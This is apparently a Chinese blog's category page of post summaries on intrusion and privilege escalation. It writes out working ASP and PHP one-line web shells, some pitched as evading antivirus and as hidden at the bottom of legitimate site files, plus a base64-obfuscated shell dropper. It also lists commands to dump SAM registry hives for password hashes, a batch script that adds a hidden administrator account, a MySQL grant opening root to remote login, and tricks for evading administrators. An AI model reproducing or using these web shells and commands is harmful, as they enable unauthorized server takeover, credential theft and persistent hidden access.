随笔分类 - 【权限相关】
摘要:以下这个ASP一句话<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%><?php ($_=@$_GET[2]).@$_($_POST[1])?>上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!<?if(isset($_POST['1'])
阅读全文
摘要:第一种:1.php <?=($_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://www.xxxxx.net/1.php?2=assert密码是1 第二种2.php <? $_=”"; $_[+""]=”; $_=”$_”.”"; $_=($_[+""]|””).($_[+""]|”").($_[+""]^””); ?> <?=${‘_’.$_}['_'](${‘_’.$_}['__']);
阅读全文
摘要:以下这个ASP一句话,也许是你见都没见过的!<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!因为加了判断! 加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}
阅读全文
摘要:收集了一些很实用的脚本,渗透基本上都会用的到:用win命令查找3389的port(包括修改后的):C:\>tasklist /svc |find “TermService”svchost.exe 1300 TermServiceC:\>netstat -ano |find “1300″TCP 0.0.0.0:61321 0.0.0.0:0 LISTENING 1300TCP 210.72.225.74:61321 123.114.166.67:1697 ESTABLISHED 1300用win命令开3389:wmic RDTOGGLE WHERE ServerName=’%COMP
阅读全文
摘要:传wce.exe 抓hash 没有任何结果又穿了Pwdump gethashes等。都没有抓到任何数据!最后用reg save hklm\sam c:\sam.hivereg save hklm\system c:\system.hivereg save hklm\security c:\security.hive导出文件然后在cain能够找到hash。。
阅读全文
摘要:服务器自动写入:mm.php内容为:<?eval($_POST[c]);?>代码:<?fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4="));?>base64_decode("bW0ucGhw") //mm.phpbase64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=") //<?eval($_POST[c]);
阅读全文
摘要:一款蛮不错的脚本,免去了到注册表导来导去的麻烦.一段隐藏用户的bat,注意脚本中的$不能去掉.net user hack$ ABCabc123!@# /addnet localgroup administrators hack$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.iniEcho HKEY_LOCAL
阅读全文
摘要:eval的一句话有时候会失败execute的一句话基本上都是成功的!By:van附:(多种写一句话的方法)ASP一句话1.<%eval request("YouPass")%>2. <%executerequest("YouPass")%>3. <%execute(request("YouPass"))%>免杀大部分网站的一句话4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.La
阅读全文
摘要:前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧)下面来说sa下执行命令错误的几种情况:1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你.
阅读全文
摘要:如果遇到了服务器开启了 3306 端口,但是不允许root外连的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权.GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root密码' WITH GRANT OPTION;
阅读全文
摘要:通常通过命令netstat -ano看到3389端口就说明已经开启的远程管理,当然是端口没有修改的情况了.但是经常我们还是会碰到无法连接情况,本文就增对可能遇到的情况进行一些说明,包含问题和解决的思路办法,要根据实际情况灵活应变.1.情况一:服务器处在内网中 思路:通过端口反弹到你本机,利用Lcx反弹是最常见的手法,另外如果你有同一个网络的肉鸡那么同样也是可以的.2.情况二:做了IP安全策略 思路:停止IP安全策略服务即可,命令:net stop policyagent3.情况三:系统防火墙的拦截 思路:同情况一的思路一致4.情况四:系统用户只设置了某些用户才能登陆5.情况五:系统做了T...
阅读全文
摘要:一:找可写目录这个很关键的,星外可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。C:\7i24.com\iissafe\log\ ’旧的星外可写,可以执行,但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的找可写其实 除了星外提权漏洞,大家一般的都可以找到,而且temp 都可以执行成功,二:杀器提权等各种提权,敏感文件然后什么反弹shell,还有一些敏感文件 ,找root sa 等 config 配置文件就不要我教了把
阅读全文
摘要:需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:你的服务器IP:远程端口IIS管理器 快捷:inetmgr.exe=====================================================================
阅读全文
摘要:常见虚拟主机目录对照D:\virtualhost\web580651\www\ 新网虚拟主机F:\usr\fw04408\xpinfo\ 万网虚拟主机D:\hosting\wwwroot\Prim@Hosting虚拟主机e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机d:\freehost\zhoudeyang\web\ 星外虚拟主机主机D:\vhostroot\LocalUser\gdrt\ 星外分支f:\host\wz8088\web\ 星外分支D:\Vhost\WebRoot\51dancecn\ 未知D:\vhostroot\localuser\ vhostro
阅读全文
摘要:我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦 copy 文件名/参数 + 文件名/参数 生成文件名 这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀。mdb的数据库中,前提是在我们拿到 一个webshell之后… 我们所知道的,很多站点在用户注册的时候要让填好多东西例如: 用户名、密码、qq、邮箱、个人简介、电话、联系方式...
阅读全文
摘要:有时候一些人对服务器的添加用户的NET和NET1权限做了限制,让很多菜鸟朋友们望而止步。其实个人感觉遇到这个问题都很容易解决的,在此我也共享出我的方法给大家。 cmd命令删除net和net1文件。一般删除之后系统会自动恢复文件,恢复的时候权限是系统重新默认的。大家就可以引用下面这段命令1:del C:\WINDOWS\system32\net.exe2:del C:\WINDOWS\system32\net1.exe你在cmd命令之后你会惊奇的发现可以使用cmd命令来添加系统帐户了,如果提示系统未能找到该文件的话就自己上传一个去,这个我也不用多说了,也就是自己系统下面的net文件xp系统下的n
阅读全文
摘要:检测管理员上线就注销自已:12345@echo off:checkchoice /C YN /T 10 /D Yquser find "#16" && del xx.bat logoffgoto check每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。下面适应使用拥有管理员权限的其他帐号:123@echo offlogoff 1del log.batlogoff后面的1改成自己登陆的ID号,用query user查看还有一个是防止嗅探过程中把服务器挂掉:12345678910
阅读全文
摘要:代码:<object runat=server id=oScriptlhn scope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><%if err then%><object runat=server id=oScriptlhn scope=pageclassid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object><%end ifrespons
阅读全文
摘要:一:首先检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功) 能连接了,拿下服务器的机率,提高 30%了 二:用ftp模式查下一个服务器的版本 开始 -- 运行 -- cmd -- ftp (加你要登陆的网站) --------------------------------------------------------------------------------------- 第一步:最简单的方法 看有没有权限,能不能执行命令,行的话直接传个鸽子运行(成功率非常低
阅读全文

浙公网安备 33010602011771号